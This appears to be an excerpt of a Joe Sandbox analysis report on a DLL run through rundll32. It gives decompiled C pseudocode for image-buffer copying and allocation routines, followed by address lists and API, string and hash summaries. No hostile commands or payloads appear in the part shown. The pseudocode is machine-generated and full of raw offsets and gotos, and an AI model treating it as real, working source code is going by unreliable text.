                                                      							_t388 = _t386 + _t555[0x26] - 1 >> _t456;
                                                      							_t429 = _t555[0x22][4 + _t539 * 4];
                                                      							_t555[0xc] = _t388;
                                                      							if(_t388 <= 0) {
                                                      								goto L18;
                                                      							}
                                                      							_t553 =  *(_t555 + 0x54 + _t539 * 4);
                                                      							_t555[0x10] = _t539;
                                                      							_t555[0xb] = 0;
                                                      							_t398 = _t555[0x20];
                                                      							_t555[0xd] = _t555[0x11] & _t553 + _t555[0x27] - 0x00000001;
                                                      							do {
                                                      								_t458 = _t553;
                                                      								_t514 = _t398;
                                                      								_t541 = _t429;
                                                      								if(_t553 >= 8) {
                                                      									if((_t398 & 0x00000001) != 0) {
                                                      										_t514 = _t398 + 1;
                                                      										_t541 = _t429 + 1;
                                                      										 *_t398 =  *_t429 & 0x000000ff;
                                                      										_t458 = _t553 - 1;
                                                      									}
                                                      									if((_t514 & 0x00000002) != 0) {
                                                      										_t494 =  *_t541 & 0x0000ffff;
                                                      										_t514 = _t514 + 2;
                                                      										_t541 = _t541 + 2;
                                                      										_t458 = _t458 - 2;
                                                      										 *(_t514 - 2) = _t494;
                                                      									}
                                                      									if((_t514 & 0x00000004) != 0) {
                                                      										_t495 =  *_t541;
                                                      										_t514 = _t514 + 4;
                                                      										_t541 = _t541 + 4;
                                                      										_t458 = _t458 - 4;
                                                      										 *(_t514 - 4) = _t495;
                                                      									}
                                                      								}
                                                      								_t399 = memcpy(_t514, _t541, _t458);
                                                      								_t555 =  &(_t555[3]);
                                                      								_t555[0xb] =  &(_t555[0xb][1]);
                                                      								_t517 = _t555[0xd];
                                                      								_t398 = _t399 + _t517;
                                                      								_t429 = _t429 +  *(_t555[0xe]);
                                                      							} while (_t555[0xc] != _t555[0xb]);
                                                      							_t539 = _t555[0x10];
                                                      							_t68 =  &(_t555[0x20]);
                                                      							 *_t68 = _t555[0x20] + _t555[0xc] * _t517;
                                                      							__eflags =  *_t68;
                                                      							L18:
                                                      							_t539 = _t539 + 1;
                                                      							__eflags = _t555[0xf] - _t539;
                                                      							if(_t555[0xf] != _t539) {
                                                      								__eflags = _t539 - 1;
                                                      								if(_t539 <= 1) {
                                                      									_t456 = _t555[0x12][6] & 0x000000ff;
                                                      									_t386 = 1 << _t456;
                                                      								} else {
                                                      									_t386 = 1;
                                                      									_t456 = 0;
                                                      									__eflags = 0;
                                                      								}
                                                      								_t555[0xe] =  &(_t555[0xe][4]);
                                                      								continue;
                                                      							}
                                                      							_t389 = _t555[0x12];
                                                      							_t544 = _t555[0x13];
                                                      							_t540 = _t555[0x22];
                                                      							__eflags = _t389[8] & 0x00000002;
                                                      							if((_t389[8] & 0x00000002) != 0) {
                                                      								_t457 = _t555[0x20];
                                                      								_t393 = 0;
                                                      								__eflags = 0;
                                                      								do {
                                                      									 *((intOrPtr*)(_t457 + _t393)) =  *((intOrPtr*)(_t540[4] + _t393));
                                                      									_t393 = _t393 + 4;
                                                      									__eflags = _t393 - 0x400;
                                                      								} while (_t393 != 0x400);
                                                      							}
                                                      							L28:
                                                      							return _t544;
                                                      							goto L121;
                                                      						}
                                                      					}
                                                      				}
                                                      				L121:
                                                      			}

                                                      0x10020f71
                                                      0x10020f7b
                                                      0x10020f7f
                                                      0x10020f83
                                                      0x10020f87
                                                      0x10020f8b
                                                      0x10020f8e
                                                      0x10020f92
                                                      0x10020f92
                                                      0x10020f94
                                                      0x10020fa0
                                                      0x10020fa0
                                                      0x10020fa4
                                                      0x10020fa6
                                                      0x10020fa8
                                                      0x10020fac
                                                      0x10020faf
                                                      0x10020fbd
                                                      0x10020fbd
                                                      0x10020fbf
                                                      0x00000000
                                                      0x00000000
                                                      0x10020fb8
                                                      0x10020fb9
                                                      0x10020fbb
                                                      0x10021030
                                                      0x10021030
                                                      0x10021034
                                                      0x10021036
                                                      0x10021039
                                                      0x1002103b
                                                      0x1002104e
                                                      0x10021054
                                                      0x1002105a
                                                      0x100210d0
                                                      0x100210d3
                                                      0x100210da
                                                      0x100210da
                                                      0x1002105c
                                                      0x10021062
                                                      0x100210c5
                                                      0x100210c8
                                                      0x100210cb
                                                      0x100210cb
                                                      0x10021064
                                                      0x1002106a
                                                      0x100210bb
                                                      0x100210bd
                                                      0x100210c0
                                                      0x100210c0
                                                      0x1002106c
                                                      0x1002106e
                                                      0x10021071
                                                      0x10021074
                                                      0x10021074
                                                      0x10021074
                                                      0x10021074
                                                      0x1002103d
                                                      0x1002103d
                                                      0x10021040
                                                      0x10021042
                                                      0x10021042
                                                      0x10021044
                                                      0x10021044
                                                      0x10021047
                                                      0x10021048
                                                      0x10021048
                                                      0x1002104c
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x10020fbb
                                                      0x10020fc1
                                                      0x10020fc6
                                                      0x00000000
                                                      0x10020fc8
                                                      0x10020fc8
                                                      0x10020fcc
                                                      0x10020fce
                                                      0x10020fd2
                                                      0x10020fd5
                                                      0x10020fd7
                                                      0x10021078
                                                      0x1002107e
                                                      0x100210f4
                                                      0x100210f7
                                                      0x100210fa
                                                      0x100210fb
                                                      0x100210ff
                                                      0x10021106
                                                      0x10021106
                                                      0x10021080
                                                      0x10021086
                                                      0x100210e2
                                                      0x100210e5
                                                      0x100210e8
                                                      0x100210eb
                                                      0x100210ee
                                                      0x100210ee
                                                      0x10021088
                                                      0x1002108e
                                                      0x10021094
                                                      0x10021096
                                                      0x10021099
                                                      0x1002109c
                                                      0x1002109f
                                                      0x1002109f
                                                      0x1002108e
                                                      0x10020fdd
                                                      0x10020fdd
                                                      0x10020fe3
                                                      0x10020fe7
                                                      0x10020feb
                                                      0x10020fef
                                                      0x10020fef
                                                      0x10020ff1
                                                      0x10020ff4
                                                      0x10020ff4
                                                      0x10020fc6
                                                      0x10020ff9
                                                      0x10021007
                                                      0x10021009
                                                      0x10021009
                                                      0x10021009
                                                      0x10021009
                                                      0x10020fa0
                                                      0x1002100f
                                                      0x10021013
                                                      0x1002101c
                                                      0x1002101c
                                                      0x10021026
                                                      0x10021026
                                                      0x10020ec8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x10020d93
                                                      0x00000000
                                                      0x10020bbe
                                                      0x10020bbe
                                                      0x10020bc6
                                                      0x10020bc8
                                                      0x10020bcb
                                                      0x10020bce
                                                      0x10020bd2
                                                      0x00000000
                                                      0x10020bd8
                                                      0x10020bd8
                                                      0x10020bdb
                                                      0x10020c3b
                                                      0x10020c3b
                                                      0x10020c46
                                                      0x10020c4a
                                                      0x10020c4c
                                                      0x10020c56
                                                      0x10020c56
                                                      0x10020c59
                                                      0x10020c61
                                                      0x10020c68
                                                      0x10020c6a
                                                      0x10020c6a
                                                      0x10020c6c
                                                      0x10020c70
                                                      0x10020c76
                                                      0x10020c7d
                                                      0x10020c7e
                                                      0x10020c83
                                                      0x10020c8c
                                                      0x10020c93
                                                      0x10020c96
                                                      0x10020c9d
                                                      0x10020ca4
                                                      0x00000000
                                                      0x00000000
                                                      0x10020caa
                                                      0x10020cad
                                                      0x10020cba
                                                      0x10020cba
                                                      0x10020cbc
                                                      0x00000000
                                                      0x10020cc2
                                                      0x10020cc2
                                                      0x10020cc4
                                                      0x10020dc8
                                                      0x10020dc8
                                                      0x10020dcb
                                                      0x10020dcd
                                                      0x10020dd0
                                                      0x10020df4
                                                      0x10020df6
                                                      0x10020e06
                                                      0x10020e06
                                                      0x10020dd2
                                                      0x10020dd2
                                                      0x10020dd5
                                                      0x10020de3
                                                      0x10020de3
                                                      0x10020dd5
                                                      0x10020cca
                                                      0x10020cca
                                                      0x10020cd0
                                                      0x00000000
                                                      0x10020cd6
                                                      0x10020cde
                                                      0x10020cde
                                                      0x10020ce0
                                                      0x10020ce0
                                                      0x10020cd0
                                                      0x10020ce3
                                                      0x10020cea
                                                      0x10020cee
                                                      0x10020cf0
                                                      0x10020cf0
                                                      0x10020cf3
                                                      0x10020cf6
                                                      0x10020cf6
                                                      0x10020cfa
                                                      0x10020d05
                                                      0x10020d08
                                                      0x10020d0e
                                                      0x10020d14
                                                      0x10020d1f
                                                      0x10020d2a
                                                      0x10020d35
                                                      0x10020d3d
                                                      0x10020d48
                                                      0x10020d4c
                                                      0x10020d4d
                                                      0x10020d51
                                                      0x10020d55
                                                      0x10020d58
                                                      0x10020d5c
                                                      0x10020d65
                                                      0x10020d67
                                                      0x00000000
                                                      0x10020d6d
                                                      0x10020d6d
                                                      0x10020d71
                                                      0x00000000
                                                      0x10020d71
                                                      0x10020d67
                                                      0x10020caf
                                                      0x10020caf
                                                      0x10020cb4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x10020cb4
                                                      0x00000000
                                                      0x10020cad
                                                      0x00000000
                                                      0x10020bdd
                                                      0x10020bdd
                                                      0x10020be0
                                                      0x10020be3
                                                      0x10020be7
                                                      0x10020be9
                                                      0x10020bec
                                                      0x10020bf0
                                                      0x10020bf3
                                                      0x00000000
                                                      0x10020bf9
                                                      0x10020bf9
                                                      0x10020bfc
                                                      0x00000000
                                                      0x10020bfe
                                                      0x10020bfe
                                                      0x10020c01
                                                      0x10020c04
                                                      0x10020c08
                                                      0x10020c0a
                                                      0x10020c0d
                                                      0x10020c11
                                                      0x10020c14
                                                      0x00000000
                                                      0x10020c1a
                                                      0x10020c1a
                                                      0x10020c1d
                                                      0x00000000
                                                      0x10020c1f
                                                      0x10020c1f
                                                      0x10020c22
                                                      0x10020c25
                                                      0x10020c29
                                                      0x10020c2b
                                                      0x10020c2e
                                                      0x10020c32
                                                      0x10020c35
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x10020c35
                                                      0x10020c1d
                                                      0x10020c14
                                                      0x10020bfc
                                                      0x10020bf3
                                                      0x10020bdb
                                                      0x10020bd2
                                                      0x10020bb8
                                                      0x10020bac
                                                      0x10020b95
                                                      0x10020b83
                                                      0x10020919
                                                      0x10020925
                                                      0x10020927
                                                      0x10020935
                                                      0x10020937
                                                      0x1002093d
                                                      0x10020941
                                                      0x10020946
                                                      0x1002094a
                                                      0x1002095c
                                                      0x1002095e
                                                      0x10020962
                                                      0x10020968
                                                      0x00000000
                                                      0x00000000
                                                      0x1002096e
                                                      0x10020974
                                                      0x1002097f
                                                      0x1002098d
                                                      0x10020994
                                                      0x100209be
                                                      0x100209c1
                                                      0x100209c3
                                                      0x100209c5
                                                      0x100209c7
                                                      0x100209cb
                                                      0x10020a3b
                                                      0x10020a3e
                                                      0x10020a41
                                                      0x10020a43
                                                      0x10020a43
                                                      0x100209d3
                                                      0x10020a20
                                                      0x10020a23
                                                      0x10020a26
                                                      0x10020a29
                                                      0x10020a2c
                                                      0x10020a2c
                                                      0x100209db
                                                      0x100209dd
                                                      0x100209df
                                                      0x100209e2
                                                      0x100209e5
                                                      0x100209e8
                                                      0x100209e8
                                                      0x100209db
                                                      0x100209a0
                                                      0x100209a0
                                                      0x100209a6
                                                      0x100209aa
                                                      0x100209b4
                                                      0x100209b6
                                                      0x100209b8
                                                      0x100209f4
                                                      0x100209fb
                                                      0x100209fb
                                                      0x100209fb
                                                      0x10020a02
                                                      0x10020a02
                                                      0x10020a03
                                                      0x10020a07
                                                      0x10020a09
                                                      0x10020a0c
                                                      0x10020a54
                                                      0x10020a5d
                                                      0x10020a0e
                                                      0x10020a0e
                                                      0x10020a13
                                                      0x10020a13
                                                      0x10020a13
                                                      0x10020a15
                                                      0x00000000
                                                      0x10020a15
                                                      0x10020a68
                                                      0x10020a6c
                                                      0x10020a70
                                                      0x10020a7d
                                                      0x10020a80
                                                      0x10020a82
                                                      0x10020a89
                                                      0x10020a89
                                                      0x10020a90
                                                      0x10020a96
                                                      0x10020a99
                                                      0x10020a9c
                                                      0x10020a9c
                                                      0x10020a90
                                                      0x10020aa3
                                                      0x10020aac
                                                      0x00000000
                                                      0x10020aac
                                                      0x1002094a
                                                      0x10020913
                                                      0x00000000

                                                      APIs
                                                      • mv_image_get_buffer_size.MAIN ref: 10020869
                                                        • Part of subcall function 10020660: mv_pix_fmt_desc_get.MAIN ref: 1002067F
                                                        • Part of subcall function 10020660: mv_image_get_linesize.MAIN ref: 100206B4
                                                        • Part of subcall function 10020660: mv_image_fill_linesizes.MAIN(?), ref: 10020748
                                                        • Part of subcall function 10020660: mv_image_fill_plane_sizes.MAIN(?), ref: 100207AB
                                                      • mv_pix_fmt_desc_get.MAIN ref: 10020873
                                                      • mv_image_fill_linesizes.MAIN ref: 1002090C
                                                      • mv_log.MAIN ref: 10020AE8
                                                      • abort.MSVCRT ref: 10020AED
                                                      • mv_pix_fmt_desc_get.MAIN ref: 10020B14
                                                      • mv_pix_fmt_count_planes.MAIN ref: 10020B1E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_pix_fmt_desc_get$mv_image_fill_linesizes$abortmv_image_fill_plane_sizesmv_image_get_buffer_sizemv_image_get_linesizemv_logmv_pix_fmt_count_planes
                                                      • String ID: $Assertion %s failed at %s:%d
                                                      • API String ID: 1281078460-3513380740
                                                      • Opcode ID: 99e06289daf78a6ca96af0f60519a31471a37a4d134c2c0f1ab6416b77e2cdf9
                                                      • Instruction ID: fe239d7c88f41c1dfdb003e78fe5e5a72561725cb47db01215c2ba04b777841e
                                                      • Opcode Fuzzy Hash: 99e06289daf78a6ca96af0f60519a31471a37a4d134c2c0f1ab6416b77e2cdf9
                                                      • Instruction Fuzzy Hash: 9D426E75A083858FC760CF28D48069EBBE2FFC8354F96892DF99997312D771E9418B42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_mallocz$mv_calloc
                                                      • String ID:
                                                      • API String ID: 1417229449-0
                                                      • Opcode ID: 11c5df3fdc17ecbdb580f76e82102d0b651416b72ae8ebbfb0f71fad63a734a3
                                                      • Instruction ID: 5eac887c21a6c61861bed7af62f95aa57474651100df0996b3e61034f298f0f1
                                                      • Opcode Fuzzy Hash: 11c5df3fdc17ecbdb580f76e82102d0b651416b72ae8ebbfb0f71fad63a734a3
                                                      • Instruction Fuzzy Hash: 4151F574605B529BC750EF69D88061AF7E0FF48794F42892CE9958B309EB34F890CBD2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_expr_parse_and_evalmv_opt_find2
                                                      • String ID: all$default$max$min$none
                                                      • API String ID: 1085414910-3292705889
                                                      • Opcode ID: 05f116ab4216a71b82e377bc1341495c5a2543e1ca9045ea53113bbb773d4fbb
                                                      • Instruction ID: 18531c70e26c900463f27e75ba25a0c49568f7c26c871f4daec10b5f5a2a946d
                                                      • Opcode Fuzzy Hash: 05f116ab4216a71b82e377bc1341495c5a2543e1ca9045ea53113bbb773d4fbb
                                                      • Instruction Fuzzy Hash: FD512574A097458BC391EF68E04079BBBE5FFC9354F618A2EE8C8C7200EB71D8448B42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                      			E10013480() {
                                                      				int _t125;
                                                      				void* _t127;
                                                      				void* _t128;
                                                      				signed char* _t138;
                                                      				signed char _t141;
                                                      				signed int _t143;
                                                      				void* _t145;
                                                      				signed char _t148;
                                                      				signed int _t150;
                                                      				int _t153;
                                                      				int _t154;
                                                      				int _t161;
                                                      				void _t162;
                                                      				signed int _t163;
                                                      				void* _t164;
                                                      				void _t168;
                                                      				signed int _t171;
                                                      				int _t172;
                                                      				signed int _t175;
                                                      				int _t176;
                                                      				signed int* _t177;
                                                      				int* _t178;
                                                      				int _t179;
                                                      				int _t182;
                                                      				int _t185;
                                                      				signed int _t193;
                                                      				signed int _t194;
                                                      				int _t195;
                                                      				signed int _t196;
                                                      				int _t198;
                                                      				void* _t202;
                                                      				signed int _t205;
                                                      				int _t206;
                                                      				void* _t215;
                                                      				void* _t218;
                                                      				void* _t222;
                                                      				void* _t232;
                                                      				void* _t233;
                                                      				void* _t234;
                                                      				int _t236;
                                                      				void* _t239;
                                                      				void* _t240;
                                                      				signed char* _t246;
                                                      				signed int _t247;
                                                      				void _t248;
                                                      				int* _t249;
                                                      				int* _t250;
                                                      
                                                      				_t177 = _t249[0x1c];
                                                      				_t125 = _t249[0x1d];
                                                      				if(_t177 == 0 || _t125 <= 3) {
                                                      					L36:
                                                      					_t249[0x12] = 0;
                                                      					goto L37;
                                                      				} else {
                                                      					_t194 =  *_t177;
                                                      					_t178 =  &(_t177[1]);
                                                      					_t249[0x11] = 0;
                                                      					_t127 = _t125 - 4;
                                                      					asm("bswap edx");
                                                      					_t249[0x10] = _t194;
                                                      					if(_t194 != 0 && _t127 > 0xf) {
                                                      						_t249[0xa] = 0;
                                                      						_t249[0xb] = 0;
                                                      						_t249[0x12] = 0;
                                                      						while(1) {
                                                      							_t195 =  *_t178;
                                                      							_t128 = _t127 - 0x10;
                                                      							_t249[8] = _t128;
                                                      							_t171 = _t178[2];
                                                      							_t249[0xc] = _t128;
                                                      							_t249[0xd] = 0;
                                                      							asm("bswap edx");
                                                      							_t249[5] = _t195;
                                                      							_t196 = _t178[1];
                                                      							asm("bswap ebx");
                                                      							asm("bswap edx");
                                                      							_t249[0xe] = _t196;
                                                      							_t249[6] = _t196;
                                                      							_t249[7] = 0;
                                                      							_t198 = _t178[3];
                                                      							asm("bswap edx");
                                                      							_t249[9] = _t198;
                                                      							asm("adc edi, edx");
                                                      							asm("adc edi, edx");
                                                      							asm("sbb eax, edi");
                                                      							if(_t249[8] < _t195 + _t198 + _t196 * _t171) {
                                                      								break;
                                                      							}
                                                      							_t249[2] = _t171;
                                                      							_t249[0xc] =  &(_t178[4]);
                                                      							_t249[3] = _t249[9];
                                                      							_t249[1] = _t249[0xe];
                                                      							 *_t249 = _t249[5];
                                                      							_t138 = E10013100(_t178);
                                                      							_t202 = _t249[0xc];
                                                      							_t246 = _t138;
                                                      							if(_t138 == 0) {
                                                      								break;
                                                      							}
                                                      							if((_t249[0xb] | _t249[0xa]) == 0) {
                                                      								_t249[0x12] = _t246;
                                                      							} else {
                                                      								 *(_t249[0xf] + 0x1c) = _t246;
                                                      							}
                                                      							_t179 = _t249[5];
                                                      							_t232 = _t202;
                                                      							_t141 =  *_t246;
                                                      							_t215 = _t141;
                                                      							if(_t179 >= 8) {
                                                      								if((_t141 & 0x00000001) != 0) {
                                                      									_t232 = _t202 + 1;
                                                      									_t215 = _t215 + 1;
                                                      									 *_t141 =  *_t202 & 0x000000ff;
                                                      									_t179 = _t249[5] - 1;
                                                      								}
                                                      								if((_t215 & 0x00000002) != 0) {
                                                      									_t143 =  *_t232 & 0x0000ffff;
                                                      									_t215 = _t215 + 2;
                                                      									_t232 = _t232 + 2;
                                                      									_t179 = _t179 - 2;
                                                      									 *(_t215 - 2) = _t143;
                                                      								}
                                                      								if((_t215 & 0x00000004) != 0) {
                                                      									_t168 =  *_t232;
                                                      									_t215 = _t215 + 4;
                                                      									_t232 = _t232 + 4;
                                                      									_t179 = _t179 - 4;
                                                      									 *(_t215 - 4) = _t168;
                                                      								}
                                                      							}
                                                      							memcpy(_t215, _t232, _t179);
                                                      							_t250 =  &(_t249[3]);
                                                      							_t145 = _t250[5];
                                                      							_t233 = _t202 + _t145;
                                                      							_t250[0xc] = _t233;
                                                      							_t250[0xf] = _t250[8] - _t145;
                                                      							if((_t250[0xe] | _t250[7]) == 0) {
                                                      								L19:
                                                      								_t172 = _t250[9];
                                                      								_t148 = _t246[0x14];
                                                      								_t234 = _t250[0xc];
                                                      								_t182 = _t172;
                                                      								_t218 = _t148;
                                                      								if(_t172 >= 8) {
                                                      									if((_t148 & 0x00000001) != 0) {
                                                      										_t205 =  *_t234 & 0x000000ff;
                                                      										_t234 = _t234 + 1;
                                                      										_t218 = _t218 + 1;
                                                      										_t250[5] = _t205;
                                                      										 *_t148 = _t205;
                                                      										_t182 = _t250[9] - 1;
                                                      									}
                                                      									if((_t218 & 0x00000002) != 0) {
                                                      										_t150 =  *_t234 & 0x0000ffff;
                                                      										_t218 = _t218 + 2;
                                                      										_t234 = _t234 + 2;
                                                      										_t182 = _t182 - 2;
                                                      										 *(_t218 - 2) = _t150;
                                                      									}
                                                      									if((_t218 & 0x00000004) != 0) {
                                                      										_t162 =  *_t234;
                                                      										_t218 = _t218 + 4;
                                                      										_t234 = _t234 + 4;
                                                      										_t182 = _t182 - 4;
                                                      										 *(_t218 - 4) = _t162;
                                                      									}
                                                      								}
                                                      								memcpy(_t218, _t234, _t182);
                                                      								_t249 =  &(_t250[3]);
                                                      								_t206 = _t249[9];
                                                      								_t178 = _t249[0xc] + _t206;
                                                      								_t127 = _t249[0xf] - _t206;
                                                      								_t249[0xa] = _t249[0xa] + 1;
                                                      								asm("adc dword [esp+0x2c], 0x0");
                                                      								if((_t249[0x11] ^ _t249[0xb] | _t249[0x10] ^ _t249[0xa]) == 0) {
                                                      									L37:
                                                      									return _t249[0x12];
                                                      								} else {
                                                      									if(_t127 <= 0xf) {
                                                      										_t153 = _t249[0x12];
                                                      										if(_t153 == 0) {
                                                      											goto L36;
                                                      										}
                                                      										_t175 = 0;
                                                      										_t236 = _t153;
                                                      										if( *((intOrPtr*)(_t153 + 0xc)) == 0) {
                                                      											L46:
                                                      											_t154 = _t249[0x12];
                                                      											_t155 =  *((intOrPtr*)(_t154 + 0x1c));
                                                      											if( *((intOrPtr*)(_t154 + 0x1c)) != 0) {
                                                      												E10012850(_t155);
                                                      											}
                                                      											_t176 = _t249[0x12];
                                                      											 *_t249 =  *_t176;
                                                      											L100265B0();
                                                      											 *_t249 =  *(_t176 + 8);
                                                      											L100265B0();
                                                      											 *_t249 =  *(_t176 + 0x14);
                                                      											L100265B0();
                                                      											 *_t249 = _t176;
                                                      											L100265B0();
                                                      											goto L36;
                                                      										}
                                                      										do {
                                                      											_t161 =  *( *((intOrPtr*)(_t236 + 8)) + _t175 * 4);
                                                      											_t175 = _t175 + 1;
                                                      											 *_t249 = _t161;
                                                      											L100265B0();
                                                      										} while (_t175 <  *((intOrPtr*)(_t236 + 0xc)));
                                                      										goto L46;
                                                      									}
                                                      									_t249[0xf] = _t246;
                                                      									continue;
                                                      								}
                                                      							} else {
                                                      								_t250[5] = _t233;
                                                      								_t163 = 0;
                                                      								_t250[8] = _t246;
                                                      								goto L13;
                                                      								L13:
                                                      								_t185 = _t171;
                                                      								_t222 =  *(_t250[8][8] + _t163 * 4);
                                                      								_t239 = _t250[5];
                                                      								if(_t171 >= 8) {
                                                      									if((_t222 & 0x00000001) != 0) {
                                                      										_t193 =  *_t239 & 0x000000ff;
                                                      										_t222 = _t222 + 1;
                                                      										_t239 = _t239 + 1;
                                                      										_t250[0x13] = _t193;
                                                      										 *(_t222 - 1) = _t193;
                                                      										_t185 = _t171 - 1;
                                                      									}
                                                      									if((_t222 & 0x00000002) != 0) {
                                                      										_t247 =  *_t239 & 0x0000ffff;
                                                      										_t222 = _t222 + 2;
                                                      										_t239 = _t239 + 2;
                                                      										_t185 = _t185 - 2;
                                                      										 *(_t222 - 2) = _t247;
                                                      									}
                                                      									if((_t222 & 0x00000004) != 0) {
                                                      										_t248 =  *_t239;
                                                      										_t222 = _t222 + 4;
                                                      										_t239 = _t239 + 4;
                                                      										_t185 = _t185 - 4;
                                                      										 *(_t222 - 4) = _t248;
                                                      									}
                                                      								}
                                                      								_t164 = memcpy(_t222, _t239, _t185);
                                                      								_t250 =  &(_t250[3]);
                                                      								_t240 = _t164;
                                                      								_t250[5] = _t250[5] + _t171;
                                                      								_t163 = _t164 + 1;
                                                      								asm("adc edx, 0x0");
                                                      								if((_t250[7] ^ 0 | _t250[6] ^ _t163) == 0) {
                                                      									_t246 = _t250[8];
                                                      									_t250[0xc] = _t250[0xc] + (_t240 + 1) * _t171;
                                                      									_t250[0xf] = _t250[0xf] - (_t250[0xe] - 1) * _t171 - _t171;
                                                      									goto L19;
                                                      								} else {
                                                      									goto L13;
                                                      								}
                                                      							}
                                                      						}
                                                      						_t133 = _t249[0x12];
                                                      						if(_t249[0x12] != 0) {
                                                      							E10012850(_t133);
                                                      						}
                                                      					}
                                                      					goto L36;
                                                      				}
                                                      			}

                                                      0x10013670
                                                      0x10013672
                                                      0x10013702
                                                      0x100137bd
                                                      0x100137c0
                                                      0x100137c3
                                                      0x100137c4
                                                      0x100137c8
                                                      0x100137ce
                                                      0x100137ce
                                                      0x1001370e
                                                      0x100137a8
                                                      0x100137ab
                                                      0x100137ae
                                                      0x100137b1
                                                      0x100137b4
                                                      0x100137b4
                                                      0x1001371a
                                                      0x10013720
                                                      0x10013722
                                                      0x10013725
                                                      0x10013728
                                                      0x1001372b
                                                      0x1001372b
                                                      0x1001371a
                                                      0x10013678
                                                      0x10013678
                                                      0x1001367a
                                                      0x1001368a
                                                      0x1001368c
                                                      0x10013692
                                                      0x10013697
                                                      0x100136aa
                                                      0x10013787
                                                      0x10013792
                                                      0x100136b0
                                                      0x100136b3
                                                      0x100137eb
                                                      0x100137f1
                                                      0x00000000
                                                      0x00000000
                                                      0x100137f6
                                                      0x100137f8
                                                      0x100137fc
                                                      0x10013814
                                                      0x10013814
                                                      0x10013818
                                                      0x1001381d
                                                      0x1001381f
                                                      0x1001381f
                                                      0x10013824
                                                      0x1001382a
                                                      0x1001382d
                                                      0x10013835
                                                      0x10013838
                                                      0x10013840
                                                      0x10013843
                                                      0x10013848
                                                      0x1001384b
                                                      0x00000000
                                                      0x1001384b
                                                      0x10013800
                                                      0x10013803
                                                      0x10013806
                                                      0x10013807
                                                      0x1001380a
                                                      0x1001380f
                                                      0x00000000
                                                      0x10013800
                                                      0x100136b9
                                                      0x00000000
                                                      0x100136b9
                                                      0x100135c5
                                                      0x100135c5
                                                      0x100135c9
                                                      0x100135cd
                                                      0x100135d1
                                                      0x100135f6
                                                      0x100135fd
                                                      0x10013602
                                                      0x10013605
                                                      0x10013609
                                                      0x10013611
                                                      0x10013760
                                                      0x10013763
                                                      0x10013764
                                                      0x10013765
                                                      0x10013769
                                                      0x1001376c
                                                      0x1001376c
                                                      0x1001361d
                                                      0x10013748
                                                      0x1001374b
                                                      0x1001374e
                                                      0x10013751
                                                      0x10013754
                                                      0x10013754
                                                      0x10013629
                                                      0x1001362b
                                                      0x1001362d
                                                      0x10013630
                                                      0x10013633
                                                      0x10013636
                                                      0x10013636
                                                      0x10013629
                                                      0x100135d8
                                                      0x100135d8
                                                      0x100135da
                                                      0x100135e4
                                                      0x100135e8
                                                      0x100135eb
                                                      0x100135f4
                                                      0x1001364c
